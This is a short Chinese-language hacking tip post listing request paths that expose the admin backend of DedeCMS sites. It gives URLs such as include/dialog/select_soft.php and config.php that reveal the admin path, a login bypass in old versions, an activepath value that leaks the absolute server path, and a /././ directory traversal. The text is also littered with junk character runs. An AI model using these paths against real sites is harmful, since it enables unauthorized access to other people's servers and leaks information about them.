dedecms爆后台文件技巧

admin

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理

员帐号,新版本的就直接转向了后台.

4 L$ w5 \6 R2 R: y2.include/dialog/config.php会爆出后台管理路径
* y, ?$ I8 l8 F: j3 U
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
. x' @- E8 h. D' c
/ J2 L7 D7 t! `% k  s" n" F: Y+ U4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.

( e3 i. F0 J2 v" [5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉

到根目录去.不过这些版本的访问地址有些不同.
地址为require/dialog/select_soft.php?activepath=/././././././././
. Z7 M7 y. R( v6 L: L7 g
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
% o, n. o- p4 S: C, v: N2 F存在相同问题的文件还有
include\dialog\select_images.php
include\dialog\select_media.php
* c$ }! g3 y) y5 [include\dialog\select_templets.php​